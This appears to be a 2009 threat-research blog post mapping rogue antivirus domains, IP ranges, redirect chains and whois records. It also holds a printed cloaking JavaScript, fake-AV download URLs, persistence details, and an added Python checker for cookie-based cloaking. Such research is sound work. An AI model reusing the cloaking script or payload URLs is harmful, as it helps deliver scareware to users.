int.proreportms1. com  (WinSpywareProtect)
   
ThreatExpert: rogueantispyware-winspywareprotect
 
hs.2-133.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.247.2.137 Trend Micro
   
hxxp://msantispyware2009. com  (Trend Micro: TROJ_FAKEAV.AID, TROJ_FAKEAV.GDS, TROJ_DLOAD.PG, TROJ_FAKEAV.AIN)
hxxp://addantivirus. com  
hxxp://antispylinks. com  
hxxp://antispylist. com  
hxxp://antispyme. com   
hxxp://antispypro. com  (VirusTotal; Anubis)
hxxp://antispywareup. com   
hxxp://antiviruscheckout. com  
hxxp://antivirusup. com   
hxxp://goldpcguard .com  
hxxp://pcsecuretools. com  
   
files.msas2009dl. com (94.247.2.84)

setup_1.exe
 TROJ_DLOAD.ML
   
hs.2-137.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

lol




94.247.2.215  (Other; AV)
   
antivirus--plus.com  
antivirus-plus-new. com  
antivirusplus.biz  
antivirusplus2009. com  
antivirusplus2009. net  
avplus2009. com  
bestnetcheckonline. com  (VirusTotal)
downloadantivirusplus. com  (ThreatExpert; AntivirusPlus.exe on VT)
easynetcheckonline  (Continue here)
internet-check. net  
onlinescanweb. com  (Symantec)
onlinewebscan. com  
rapldhsare. com  
security-check-center. com  (VirusTotal)
traffchecking. com  
www.antivirusplus2009. net  (Article)
   
hs.2-215.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  
ThreatExpert: RogueAntiSpyware.System Security
ThreatExpert's awareness of the file "systemsecurity.exe"

94.247.2.241  (ThreatExpert; AV)
   
hxxp://int.ms-asreport1. com  (Report; McAfee)
   
Alias: MS AntiSpyware 2009
msas2009.exe Prevx
 
Related:
hxxp://www.antispyme. com (64.191.12.38 - Netcraft)
 
Payment page:
hxxp://sales.getpaymentform. com 94.247.2.42 Netcraft
 
hs.2-241.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

64.191.12.38  (ThreatExpert)
Previous IP: 94.247.2.137   
   
hxxp://addantivirus. com  
hxxp://antispylinks. com 
hxxp://antispylist. com  
hxxp://antispyme. com  
hxxp://antiviruscheckout. com  
.............................  
hxxp://pro-antispyware2009. com  
hxxp://syscleanerpro. com  
hxxp://systemcleanerpro. com  
hxxp://system-cleanerpro. com  
hxxp://totalantispyware. com  (Report)
hxxp://totalantispyware. net  
hxxp://totalantispyware2009. com  
   
Listed at hpHosts  
   
"Ms Antispyware 2009" source.

Common download:

hxxp://files.msas2009dl. com
TROJ_DLOAD.ML

Common payment page:

hxxp://sales.getpaymentform. com
   

94.247.2.253  (ThreatExpert)

interinetskim. com  (Report)
   

91.211.65.50  (ThreatExpert; AV)
   
avscan7. com McAfee - VirusTotal
scan5new. com McAfee - VirusTotal
   
Ural-NET
Ural Industrial Limited Company
Russia
AP10609-RIPE
uralnet.biz
  
   

91.211.65.110 / 91.211.65.111  (ThreatExpert; AV; Google; other)
   
ns2.stabilityscanonline. com FireEye
stabilityscanonline. com  
   

91.211.64.173 / 91.211.64.174  (ThreatExpert; AV; Google; other)
   
ns1.stabilityscan. com FireEye
ns2.stabilityscan. com  
stabilityscan. com  
   

91.211.65.130  (ThreatExpert; AV)
   
ns1.internetskim. com  
ns1.stabilityinternetearthguide. com  
greatstabilityscanonline. com VirusTotal
   
91.211.65.131  
   
ns2.internetskim. com  
ns2.stabilityinternetearthguide. com  
   
91.211.66.10  
   
avscan7. com  
ns2.avscan7. com   
ns2.scan5new. com   
scan5new. com  
   

209.249.222.48  
   
antiviralscanner14. com  
easywinscanner17. com  
privacyscanner15. com  
sg9scanner. com  
sg10scanner. com  
sg11scanner. com  
sg12scanner. com  
sgviralscan. com  
   

209.44.126.22  (ThreatExpert)
   
onlinestabilitysite.com  
protectionskim.com  (Report)
safetyscansite.com  (Report; new)
stabilityaudit.com  (Report)
yourstabilitysystem.com  (Report; new)
   

207.126.166.11  
   
gomegascan.com  
   

209.44.126.16  
   
   
onlinestabilityguide.com  
onlinestabilitysite.com  
onlinestabilityworld.com  
systemsecurityonline.com Symantec
   

207.126.166.21  
   
scanlog6. com  
scanmain6. com   
   

207.126.166.22  
   
basescan6. com  
scanhome4. com  
scangate6. com  
gatescan6. com  
homescan6. com  
home6scan. com  
everscan6. com  
scan6now. com  
scan6gate. com  
scanhome6. com  
scangate6. com  
scanlead6. com  
   

207.126.166.41  
   
scanhome4. com  
scanjust4. com   
   

207.126.166.59  
   
goeverscan. com  
gojustscan. com  
goleadscan. com  
golinescan. com  
gologscan. com  
goscanhome. com  
goscanjust. com  
goscanlog. com  
goscanmega. com  
goscantool. com  
goscanzoom. com  
gotoolscan. com  
gouserscan. com  
scanever4. com  
scan5best. com  
   

207.126.166.83x 
   
gomegascan. com  
goscanbay. com  
goscanfuse. com  
goscansafe. com  
goscanuser. com  
goscanway. com  
gozoomscan. com  
scan6ever. com  
scan6gate. com  
just6scan. com  
justscan6. com  
linescan6. com  
scanbase6. com  
leadscan6. com  (March 13)
lead6scan. com  
   

207.126.166.84  
   
in6co. com  
scan6home. com  
scaneasy6. com  
scanplus6. com  
   

207.126.161.230  
   
gogatescan. com  
gohomescan. com  
gojustscan. com  
   

209.44.126.14  (ThreatExpert)
   
bestfiresfull. com   
fuckmoneycash. com  (Report)
getscanonline.com  (Report)
mostpopularscan. com  
scanvistanow. net   
vistastabilitynow. com  (Report)
worldnowhits. com  
   

209.44.126.22  (ThreatExpert)
    
onlinestabilitysite. com   
onlinestabilityworld. com  (Report)
onlinestabilityguide. com  (Report)
    

216.21.239.197  
   
scan4life. com  
   

62.193.202.6  
   
in8co. com  
   

65.55.39.12  
   
plusscan6. com  
scan6fast. com  (PARKED)
   

66.101.58.54  
   
easyscan6. com  
fastscan6. com  
gate6scan. com  
gobasescan. com  
igo5scan. com  
goopenscan.com  
goscangate. com  
goscanmain. com  
goscanplus. com  
goscan5. com  
scan6base. com  
scan6lead.com  
scan6line. com  
zoomscan6. com  
   

66.197.154.198  
   
go4scan. com  (Analysis on March 13)
   

69.10.52.12  
   
5scanav. com  
scan5av. com  
in5co. com  
in5is. com  
in5sk. com VirusTotal
live5scan. com  
livescan4. com  
livescan5. com  
scan5plus. com  
   

67.208.74.12  (PARKED)
   
scan6easy. com  
scan6fast. com  
scanbest6. com  
scanlive6. com  
scannew6. com  
   

67.214.175.74  
   
scan4user.com  
scan4zoom. com  (Symantec Safe Web)
   

67.214.161.149  
   
mainscan6. com  (Symantec Safe Web)
   

74.125.45.100  
   
scanbase4. com  
scangate4. com  
scan6ever. com  
   

72.232.186.18  (Taste; Reports; Anubis; ThreatExpert)

systemsecurityline. com  (Report; Report; Report 2, 3)
    

78.129.166.225  (ThreatExpert)
   
scanaonline. com  
stabilityonlinedirect. com  
webprotectionread. com  (Report)
wwwsafetyscan. com  
   

78.129.4.41  (JavaScript analysis)

scanaonline. com  (Report)
   

78.47.172.66   
   
antivirus360-protection. com  (Analysis)
protectionsoftwarecheck. com  (Analysis)
   

fast-antimalware-scanner. com  (Robtex; Alexa; Google Image)

Nameservers used by this domain (Robtex):

ns1.basicstechnology. com
ns2.basicstechnology. com
ns3.basicstechnology. com

Domains sharing these nameservers under another name (Robtex):

antivirus-premium-scan.com
antivirus360-protection.com
eosads.com
onlinetds.info
powertds.ws
privateinfoclick.com
protection-fast-scanner.com
safeinternetzone.com
securedclickhere.com
software-clicks.com
advertisechoice.cn
awardspacelooksbig.cn
bestantimalwarelivescan. com
bestantimalwarescanner. com
falloutneferwin.cn
fast-antimalware-pro-scan. com
fastantimalwarelivescan. com
fastantimalwareproscan. com
fastantimalwareproscanner. com
fastantimalwarescan. com

IP numbers of the nameservers (Robtex):

115.126.5.10
64.86.17.44
91.211.64.47

Other names of the nameservers (Robtex):

dns2.systempromns. com
dns3.systempromns. com
ns1.eguassembly. com
ns1.europegigabyte. com
ns1.fastfreetest.cn
ns1.freehostns. com
ns1.managehostdns. com
ns1.singatours. com
ns2.freefastdns. com
ns3.eguassembly. com

   

Antivirus360 source

  

78.157.143.184  (Robtex)

*.avproscan. com  (A record)

78.157.143.184     
78.157.128.0/19

SIA ULTRANET AS35057
ULTRANET AS UltraNet Ltd

*.go-iascan. com 
*.goscan-pro. com 
*.goscanpc. com 
*.ia-free-scanner. com 
*.ia-payment-pro. com 
*.ia-payment. com 
*.ia-scanpro. com 
*.iascan-pro. com 
*.inspred. com 
*.internet-antivirus-2008. com 
*.stased. com 
bestproscan.com
go-scan-pro. com 
gobestscan. com
goscanpc. com
goscan-pro. com 
ia-payment-pro. com 
ia-payment. com 
ia-scanpro. com 
iabestscan.com
iascan-pro. com 
iascanner-pro. com 
iascannerpro. com 
inspred. com 
internet-antivirus-2008. com 
internet-antivirus-pro. com 
mail.gobestscan. com 
mail.goscan-pro. com 
mail.ia-payment-pro. com 
mail.ia-payment. com 
mail.ia-scanpro. com 
mail.iascan-pro. com 
mail.iascanner-pro. com 
mail.iascannerpro. com 
mail.inspred. com 
mail.internet-antivirus-2008. com 
mail.internet-antivirus-pro. com 
mail.stased. com 
mail.wa-payment. com 
ns.goscan-pro. com 
ns.ia-payment. com 
ns.ia-scanpro. com 
ns.iascan-pro. com 
ns.inspred. com 
ns.internet-antivirus-2008. com 
ns.stased. com 
ns.wa-payment. com 
ns1.avmyscan. com 
ns1.avproinstall. com 
ns1.avproscan. com 
ns1.avprostat. com 
ns1.avscanpro. com 
ns1.go-your-scan. com 
ns1.gobestscan. com 
ns1.gomyscan. com 
ns1.goyourscan. com 
ns1.ia-download. com 
ns1.ia-payment-pro. com 
ns1.ia-payment. com 
ns1.ia-scanpro. com 
ns1.iascan-pro. com 
ns1.iascanner-pro. com 
ns1.iascannerpro. com 
ns1.inspred. com 
ns1.internet-antivirus-pro. com 
ns1.scanavpro. com 
ns1.stased. com 
ns1.wa-payment. com 
ns2.go-iascan. com 
ns2.goscan-pro. com 
ns2.goscanpc. com 
ns2.ia-free-scanner. com 
ns2.ia-scanner-pc. com 
ns2.iascanner-pro. com 
ns2.internet-antivirus-2008. com 
ns2.wa-payment. com 
ns3.ia-payment-pro. com 
ns3.ia-payment. com 
ns3.wa-payment. com 
stased. com 
wa-payment. com 
www.stased. com 
CNAME records:
stased. com
go-iascan. com
avproscan. com
ia-free-scanner. com
goscanpc. com
avprostat. com
avmyscan. com
go-your-scan. com
goyourscan. com
ia-scanner-pc. com
   

78.159.100.22  
   
line4scan. com  
log4scan. com  
   

78.159.101.11  
   
megascan4. com  
safe4scan. com  
scanmain4. com  
   

78.159.101.22  
   
homescan4. com  
justscan4. com   
leadscan4. com  
now4scan. com  
scan4tool. com  
tool4scan. com  
   

78.159.101.27  
   
any4scan.com  (March 19, new; Wepawet: redirection)
anyscan4. com  (March 17, new; VirusTotal; Anubis)
base4scan. com
data4scan.com  (March 19, new)
datascan4. com  (March 17, new; VirusTotal; Anubis)
scan4zoom. com
in4ik. com  (VirusTotal)
in4is. com
in4co. com  (Wepawet: redirection)
in4sk. com  (ThreatExpert)
goscanit. com
goanyscan. com
gofullscan. com
gofusescan. com
goscanany. com
goscanbay. com
goscanever. com
goscanfull. com  (March 13)
goscanfuse. com
goscanlist.com  (March 20, new; Wepawet: redirection 1, redirection 2)
goscanmind. com
goscanonly. com
goscanopen. com
goscanslot. com
goscanway. com
goscanwith. com
gotruescan. com
gotscan. com
gowayscan. com
litescan4. com
main4scan.com
mega4scan. com
nowscan4. com
nowscan6. com
scan4any.com  (March 21, new)
scan4data.com  (March 22, new)
scan4lite.com  (March 22, new)
scan4home. com
scan4step.com  (March 20, new)
scanlog4. com
scanmega4. com  (InternetAntivirusPro; ThreatExpert)
scansafe4. com
scanstep4. com
scantool4. com  (March 13; VirusTotal; ThreatExpert)
scanuser4.com
scanzoom4. com
stepscan4. com
true4scan.com  (March 22, new)
truescan4. com
user4scan. com
   

lol


78.159.99.52  
   
5goscan. com  
best4scan. com  
ever4scan. com  
gomyscan. com  
goscan4. com  
   

194.165.4.20ThreatExpert 
   
onlinestabilityexamine. comReport 
   

194.165.4.7ThreatExpertAnubisOther
209.160.20.117   
    
fast-antimalware-scanner. comReport  
    
91.212.65.43   
antivirus-xp-pro-2009. com ReportAnalysis
SetupAntivirusXP.exe   
    
EUROHOST-NET,91.212.65.0,91.212.65.255

91.203.92.18191.203.92.184 
   
gosafescan. com  
live4scan. com  
new4scan. com  
scan4new. com  
   

194.165.4.140 -AS48669 - NTCOLO-AS NTCOLO
  
av1scan. com 
avscan1. com 
avpayments. com 
easy6scan. comAnalysis
fast6scan. com 
general-antivirus. com 
generalantivirus. com 
gomainscan. com[Google Template]
goopenscan. com 
goproscan. com 
goscanbase. com[Redirect to Google with GeoIP]
goscanlead. com[Redirect to Google with GeoIP]
goscanline. com 
goscantrue. com 
goscanuser. com 
goscansafe. com 
gozoomscan. com 
ia-pro. com 
in1sk. com 
internetantiviruspro. com 
new4scan. com 
scan4new. com 
scan4plus. com 
  

194.165.4.41 - AS48669 - NTCOLO-AS NTCOLO
   
ns1.avscan1. com  
ns1.av1scan. com  
bestscan4. com  
bestscan6. com  
best6scan. comGoogle red.Analysis
bestscan6. comGoogle red.Analysis - Article
cokien. com  
easy4scan. com  
fast4scan. com  
fastscan4. com  
gobestscan. com  
goscantrue. com  
just4scan. com  
lead4scan. com  
live6scan. com  
livescan4. com  
livescan5. com  
livescan6. com  
new6scan. com  
newscan4. com  
newscan6. com  
plus4scan. com  
plus6scan. com  
plusscan4. com  
plus6scan. com  
plusscan4. com  
scan4easy. com  
scan4ever. com  
scan4fast. com  
scan4now. com  
scan6best. com  
scan6live. com  
scanbest4. com  
scaneasy4. com  
scanfast4. com  
scanlive4. com  
scanplus4. com  
scannew4. com  
   

others(Suspended or not served)
  
4scanav. com 
av4snscan. com 
av5scan. com 
avscan5. com 
basescan4. com 
ever6scan. com 
everscan4. com  
gatescan4. com 
gate4scan. com 
home4scan. com 
in7co. com 
new7scan. com 
newscan5. com 
pro4scan. com 
scanav4. com 
scanav5. com 
scan4line. com 
scan4main. com 
scan4safe. com 
scan6new. com 
scan4best. com 
scan4log. com 
scan4pro. com 
scan7live. com 
scanline4. com 
scanlive4. com 
plusscan6. com 
  

Some Redirection:
 
hxxp://098765. com/in.php
hxxp://lastpoher.ru/in.php
hxxp://x-more-x.net/in.php
hxxp://infidelirium.info/in.php
 
hxxp://texasvino. com
hxxp://87.248.163.58/in.php?s=texasvino. com
hxxp://onlinestabilitysite. com/index.php?affid=07105
hxxp://tool4scan. com/26/?uid=12602
 

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 07:43:28 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache
Content-Length: 0
Location: hxxp://87.248.163.58/in.php?s=texasvino. com

hxxp://87.248.163.58/in.php?s=texasvino. com

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 09:41:34 GMT
Server: Apache/2.0.55 (Unix) PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: alreadyvisited=0; expires=Fri, 06-Mar-2009 19:41:34 GMT
Location: hxxp://onlinestabilitysite. com/hitin.php?land=20&affid=07105
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

hxxp://onlinestabilitysite. com/hitin.php?land=20&affid=07105

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 15:42:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
location: index.php?affid=07105
Content-Length: 0
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

hxxp://onlinestabilitysite. com/index.php?affid=07105

(Status-Line): HTTP/1.1 200 OK
Date: Fri, 06 Mar 2009 15:42:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=1, max=99
Connection: Keep-Alive
Transfer-Encoding:chunked
Content-Type: text/html

*****************************

hxxp://87.248.163.58/in.php?s=texasvino. com

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 09:49:28 GMT
Server: Apache/2.0.55 (Unix) PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: alreadyvisited=1; expires=Fri, 06-Mar-2009 19:49:28 GMT
Location: hxxp://goscanbay. com/?uid=12602
Content-Length: 0
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html

hxxp://goscanbay. com/?uid=12602

(Status-Line): HTTP/1.1 302 Found
Server: nginx/0.6.34
Date: Fri, 06 Mar 2009 07:50:14 GMT
Content-Type: text/html
Transfer-Encoding:chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.8
location: hxxp://tool4scan. com/?uid=12602

hxxp://tool4scan. com/26/?uid=12602

******************************

hxxp://sendsometraff. com/in.php

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 14:13:37 GMT
Server: Apache/2.0.55 (Unix) PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: alreadyvisited=1; expires=Sat, 07-Mar-2009 00:13:37 GMT
Location: hxxp://goscanbay. com/?uid=12602
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

hxxp://goscanbay. com/?uid=12602

(Status-Line): HTTP/1.1 302 Found
Server: nginx/0.6.34
Date: Fri, 06 Mar 2009 12:14:22 GMT
Content-Type: text/html
Transfer-Encoding:chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.8
location: hxxp://tool4scan. com/?uid=12602

hxxp://tool4scan. com/?uid=12602

******************************

hxxp://zorroless. com/in.php

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 14:12:46 GMT
Server: Apache/2.0.55 (Unix) PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: alreadyvisited=1; expires=Sat, 07-Mar-2009 00:12:46 GMT
Location: hxxp://goscanbay. com/?uid=12602
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

hxxp://goscanbay. com/?uid=12602

(Status-Line): HTTP/1.1 302 Found
Server: nginx/0.6.34
Date: Fri, 06 Mar 2009 12:13:31 GMT
Content-Type: text/html
Transfer-Encoding:chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.8
location: http://tool4scan. com/?uid=12602

hxxp://tool4scan. com/?uid=12602

******************************

hxxp://info4us. info/in.php?v=28

(Status-Line): HTTP/1.1 302 Found
Date: Mon, 16 Mar 2009 16:15:16 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8
X-Powered-By: PHP/5.2.8
Location: http://onlinestabilityworld. com/hitin.php?land=21&affid=16400
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

hxxp://onlinestabilityworld. com/hitin.php?land=21&affid=16400
hxxp://onlinestabilityworld. com/index.php?c=0&affid=16400

*********************************

87.248.163.58

hxxp://zorroless. com/in.php
hxxp://hola-aloha. net/in.php
hxxp://x-more-x. net/in.php
hxxp://sendsometraff. com/in.php

hxxp://goscanbay. com (78.159.101.27)


202.75.63.116 / 202.75.63.117 (ThreatExpert)

u-cleaner. biz
ultimatecleaner. biz (report)
uprotect. biz (report)
xprotect. us (report)

More interestingly, a Google search for "Facebook virus" reveals this page:

hxxp://2009022118.kuj2doo.bee.pl/facebook_error_check_system.html

Script below:

 
var r = document.referrer;

// Cloaking: only visitors who arrive from a search engine (or from a cached or
// translated copy of a search result) are handed on to the traffic-distribution
// script; the referrer is forwarded so the operator can track the source.
if (r.indexOf("google") != -1 || r.indexOf("msn") != -1 ||
    r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 ||
    r.indexOf("result") != -1 || r.indexOf("cache") != -1 ||
    r.indexOf("translate") != -1) {

    document.location = "http://murtinreid. com/in.php?n=1500&s=" +
        escape(location.hostname) + "&p=" + escape(r).replace(/\+/g, "%2B");

} else {

    // Everyone else (direct visits, researchers, scanners without a referrer)
    // gets a fake Apache 404 page, so the URL looks dead when checked by hand.
    document.title = "404 Not Found";
    document.write("<h1>Not Found</h1>The requested URL " + location.pathname +
        " was not found on this server.<p><hr><address>Apache/1.3.39 Server at " +
        location.hostname + " Port 80</address><div style='display:none'>");

}

 
On Friday, 6 March, 8:00 AM PST

hxxp://murtinreid. com/in.php? (87.248.163.58)
redirects to the same site as
onlinedetect. com, 0day33hours. com, allradiohits. com

The first time you are redirected to

hxxp://stabilityaudit. com/hitin.php?land=20&affid=07105 (209.44.126.22)

and when you return to the same link you are redirected to another site:

hxxp://goscanbay. com/?uid=12602 (the redirection - 78.159.101.27)
then
hxxp://tool4scan. com/?uid=12602 - 78.159.101.27
(or another one, depending on your country, IP, language, etc.)

Coincidence or related...
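To check a suspected traffic-distribution hop for exactly this cookie-based behaviour, here is an added Python example that is not part of the original post: it replays the captured 302 chain offline from response headers constructed after the captures above (the closing 200 from tool4scan. com is assumed) and reports whether a second visit, carrying the alreadyvisited cookie, lands somewhere else than the first.

```python
# Added example, not the blog's own code. Responses are constructed from the
# captures on this page (the final 200 from tool4scan is assumed); nothing is
# fetched, and the hxxp:// defanging is kept on purpose.

def host_of(url):
    return url.split("/", 3)[2]

def parse_response(raw):
    # Lower-case the header names: the nginx hops on this page send "location:".
    status_line, *fields = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {n.strip().lower(): v.strip() for n, _, v in (f.partition(":") for f in fields)}
    return int(status_line.split()[1]), headers

def resolve(base, target):
    # urllib.parse.urljoin refuses unknown schemes such as hxxp, so join by hand
    # (needed for the relative "location: index.php?affid=07105" hop).
    if "://" in target:
        return target
    if target.startswith("/"):
        return "/".join(base.split("/", 3)[:3]) + target
    return base.split("?", 1)[0].rsplit("/", 1)[0] + "/" + target

def cookie_header(jar, host):
    return "; ".join(f"{k}={v}" for k, v in sorted(jar.get(host, {}).items()))

def follow_chain(start, captures, jar=None, max_hops=10):
    # captures maps (url, Cookie header sent) -> raw response; jar is per host.
    jar = {h: dict(c) for h, c in (jar or {}).items()}
    hops, url = [start], start
    for _ in range(max_hops):
        raw = captures.get((url, cookie_header(jar, host_of(url))))
        if raw is None:
            break
        status, headers = parse_response(raw)
        if "set-cookie" in headers:  # keep name=value, drop the attributes
            name, _, rest = headers["set-cookie"].partition("=")
            jar.setdefault(host_of(url), {})[name.strip()] = rest.split(";")[0].strip()
        if status // 100 != 3 or "location" not in headers:
            break
        url = resolve(url, headers["location"])
        hops.append(url)
    return hops, jar

def detect_cookie_cloaking(start, captures):
    # Walk twice, carrying the first walk's cookies into the second walk.
    first, jar = follow_chain(start, captures)
    second, _ = follow_chain(start, captures, jar)
    return {"first": first, "second": second, "cloaked": first[-1] != second[-1]}

CAPTURES = {  # constructed from the captures on this page
    ("hxxp://texasvino.com/", ""): "HTTP/1.1 302 Found\r\n"
        "Location: hxxp://87.248.163.58/in.php?s=texasvino.com\r\n\r\n",
    ("hxxp://87.248.163.58/in.php?s=texasvino.com", ""): "HTTP/1.1 302 Found\r\n"
        "Set-Cookie: alreadyvisited=0; expires=Fri, 06-Mar-2009 19:41:34 GMT\r\n"
        "Location: hxxp://onlinestabilitysite.com/hitin.php?land=20&affid=07105\r\n\r\n",
    ("hxxp://onlinestabilitysite.com/hitin.php?land=20&affid=07105", ""):
        "HTTP/1.1 302 Found\r\nlocation: index.php?affid=07105\r\n\r\n",
    ("hxxp://onlinestabilitysite.com/index.php?affid=07105", ""): "HTTP/1.1 200 OK\r\n\r\n",
    ("hxxp://87.248.163.58/in.php?s=texasvino.com", "alreadyvisited=0"):
        "HTTP/1.1 302 Found\r\nSet-Cookie: alreadyvisited=1; expires=Fri, 06-Mar-2009 19:49:28 GMT\r\n"
        "Location: hxxp://goscanbay.com/?uid=12602\r\n\r\n",
    ("hxxp://goscanbay.com/?uid=12602", ""):
        "HTTP/1.1 302 Found\r\nlocation: hxxp://tool4scan.com/?uid=12602\r\n\r\n",
    ("hxxp://tool4scan.com/?uid=12602", ""): "HTTP/1.1 200 OK\r\n\r\n",  # assumed
}
```

Against live infrastructure the same walk would be done with two requests per hop, one clean and one replaying the cookie jar, which is what a sandbox or URL scanner needs to do to see the second landing page at all.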

***
Same redirection:
098765. com/in.php | lastpoher. ru/in.php | x-more-x.net/in.php | ahuliard. com
***

The redirection changes every day as new domains are purchased.

Sample below...
 

Found on March 3:


The Google redirection is skipped if the HTTP_REFERER matches
a domain in this list! You are then redirected to another
site such as scan4just. com, etc.

Found on March 6

safetyexamine. com
tool4scan. com
onlinestabilitysite. com

Found on March 7

now4scan. com
scanlead4. com
easywinscanner17. com (continues at easywinscanner17. com/maldef09_2/4/10108)
(78.159.122.156 - 84.16.243.169)

Found on March 8

thestabilityscan. com

Found on March 9

stabilityscandirect. com
scanlog4. com
mega4scan. com (McAfee Site Advisor, Google)

Found on March 10

goscanopen. com (Google Safe Browsing Diagnostic)
scan4mega. com (Google Safe Browsing Diagnostic)

Found on March 11

scan4just. com (Google Safe Browsing Diagnostic)

Found on March 12

March 13

litescan4. com (analysis)
scansafe4. com
scanzoom4. com

Found on March 13

scantool4. com (analysis on March 13)
scanvistanow.net (analysis on March 13; also downloads a file
from 94.75.228.147, hosted-by.leaseweb. com)
stepscan4. com (reverse IP lookup)

Found on March 14

user4scan. com (JS analysis on March 14)

MD5: 754d4813959d15ce5863681399b81592

hxxp://user4scan.com/22/?uid=keyin
hxxp://user4scan.com/nag/?uid=144&n=nag&install=1
hxxp://user4scan.com/download/install.php
hxxp://in4co.com/cki.php?uid=keyin

Files: install.exe | InternetAntivirusPro.exe | file.exe

Analyses for each file: VirusTotal | Iseclab Anubis | ThreatExpert

Analysis Report for install.exe | file.exe

Ikarus Virus Scanner: Rootkit.Win32.TDSS (Sig-Id:455680)

HTTP Conversations

hxxp://78.159.101.27:80 - [in4sk. com]

Request: GET /download/file.exe
Response: 200 "OK"
Request: GET /download/file.exe
Response: 206 "Partial Content"
Request: GET /download/InternetAntivirusPro.exe
Response: 200 "OK"
Request: GET /download/InternetAntivirusPro.exe
Response: 206 "Partial Content"
Request: GET /reports/download-report.php?prod_id=9
Response: 200 "OK"

Registry Values Modified

HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Run
C:\Documents and Settings\user\Application Data\Microsoft\Windows\winlogon.exe

(Note the persistence: a per-user Run key pointing at a winlogon.exe dropped
under Application Data; the legitimate winlogon.exe lives in %SystemRoot%\System32,
so a Run entry with that name outside System32 is a reliable thing to look for.)

File Created

C:\Documents and Settings\user\Application Data\Microsoft\Windows\winlogon.exe (Process Activities)
c:\program files\Common Files\file.exe
c:\program files\Common Files\InternetAntivirusPro.exe
c:\program files\Internet Antivirus Pro\
C:\DOCUME~1\user\LOCALS~1\Temp\is-L32VH.tmp
C:\DOCUME~1\user\LOCALS~1\Temp\is-L32VH.tmp\InternetAntivirusPro.tmp

Analysis Report for InternetAntivirusPro.exe

FakeAlert-AB [McAfee]
Mal/FakeAV-M [Sophos]

ISSA Journal

Rash of Rogue Security Malware
pandalabs.pandasecurity.com
---
msmvps
malwarebytes
malwaredatabase

ZeuS Tracker abuse.ch

Spammer & cybercrime hosting (escalation)
 
Some malicious activities - ZLKON

94.247.3.213/32
SBL72391 Malware/virus dropper gang

94.247.3.232/32
SBL71685 imp-porntube. net / filesfreedb. com malware codec gang

94.247.2.0/23
SBL70871 zlkon. lv cybercrime spammer hosts

94.247.3.235/32
SBL70870 SECURITYADVIZR. COM etc

94.247.3.10/32
SBL70869 zazerfox. com / ns1.agns. co.cr / etc

94.247.3.9/32
SBL70868 zazerfox. com / ns1.agns. co.cr / etc

94.247.2.0/24
SBL70568 Malware DNS server NS2.MANAGEHOSTDNS .COM

94.247.2.11/32
SBL70308 Malware dropper -fake AV software: antivirus-pro-scanner .com

94.247.2.217/32
SBL70042 Canadian Pharmacy
Canadian Pharmacy image host

94.247.2.216/29
SBL70040 Canadian Pharmacy
Canadian Pharmacy image hosts
 

Domain Whois record
Queried whois.nic.lv with "zlkon. lv"...

domain: zlkon. lv
admin-c: 86617-LUMII
tech-c: 86617-LUMII
nserver: ns1.zlkon.lv
nserver: ns2.zlkon.lv
changed: dns-reg@nic.lv 20081121
source: LUMII

person: <hidden>
address: none
phone:+371 26330593
e-mail: arkadzi.daniyelian@zlkon. lv
nic-hdl: 86617-LUMII
source: LUMII

Network Whois record
Queried whois.ripe.net with "-B 94.247.2.0"...

inetnum:94.247.2.0 - 94.247.3.255
netname:ZLKON
descr: ZlKon
country:LV
admin-c:ZK508-RIPE
tech-c: DES31-RIPE
status: ASSIGNED PA
mnt-by: PCEXPRESS-MNT
mnt-lower: ZLKON-MNT
mnt-routes: ZLKON-MNT
changed:igors@pcexpress. lv 20081125
source: RIPE

role: ZlKon HostMaster
address:Lilijas iela 4-74
address:Riga, LV-1055
address:Latvija
phone: +371 26330593
e-mail: hostmaster@zlkon. lv
admin-c:AD5952-RIPE
tech-c: AD5952-RIPE
nic-hdl:ZK508-RIPE
mnt-by: ZLKON-MNT
changed:hostmaster@zlkon. lv 20081125
source: RIPE
abuse-mailbox: abuse@zlkon. lv

role: DATORU EXPRESS SERVISS HostMaster
address:18. novembra street 319C
address:Daugavpils, LV-5413
address:Latvia
phone: +371 26631339
fax-no: +371 65420725
remarks:Information: http://www.pcexpress. lv
remarks:Questions: hostmaster@pcexpress. lv
e-mail: hostmaster@pcexpress. lv
admin-c:IV745-RIPE
tech-c: IV745-RIPE
nic-hdl:DES31-RIPE
mnt-by: PCEXPRESS-MNT
changed:igors@pcexpress. lv 20081125
source: RIPE
abuse-mailbox: abuse@pcexpress. lv

% Information related to '94.247.0.0/21AS12553'

route: 94.247.0.0/21
descr: "DATORU EXPRESS SERVISS" Ltd.
origin: AS12553
mnt-by: PCEXPRESS-MNT
changed:igors@pcexpress. lv 20081121
source: RIPE

   


